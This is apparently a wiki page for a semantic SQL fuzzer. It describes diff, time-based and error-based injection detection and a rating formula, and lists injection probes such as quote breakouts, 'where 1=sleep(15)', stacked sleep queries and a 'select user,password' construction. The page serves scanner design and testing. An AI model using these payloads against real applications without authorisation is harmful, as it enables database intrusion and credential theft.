Wiki
Clone wikiAranea / Semantic SQL Fuzzer
Detection
Methods
- diff (mangle output: 1=0, 1=1)
- time (non intrusive sleep: 1=sleep(15))
- error (trigger driver error: 1=')
Rating
We can rate an engine's detection capabilities depending on the covered semantic constructions (in all sql databases!) coupled with the detection capabilities for each construction, divided by the total amount of queries made per fuzzing session summed with the extra queries for (completely!) excluding false positives.
The formula:
covered_semantic_constructions / (( total_fuzzable_queries + extra_queries_to_exclude_false_positives ) * ( all_standard_semantic_constructions + all_non_standard_semantic_constructions ))
Common SQL Constructions
Select
select * from [column]
select * from column select * from `column`
original query original` query; -- - original; query
where 1=1 where 1=0 where 1=' where 1=sleep(15) select sleep(15);
original original' original') original')) oringnal" original) original'))) oringnal") oringnal")) original)) oringnal"))) original)))
; query query
select user,password from column where id=1 limit 1,1 insert into t set a=1 insert into t ( a ) values ( 1 ) update t set a=1 where id=1
Fuzzlist
append where 1=1 append where 1=0 append where 1=' append where 1=sleep(15); append` where 1=1 append` where 1=0 append` where 1=' append` where 1=sleep(15); append; select sleep(15);
Updated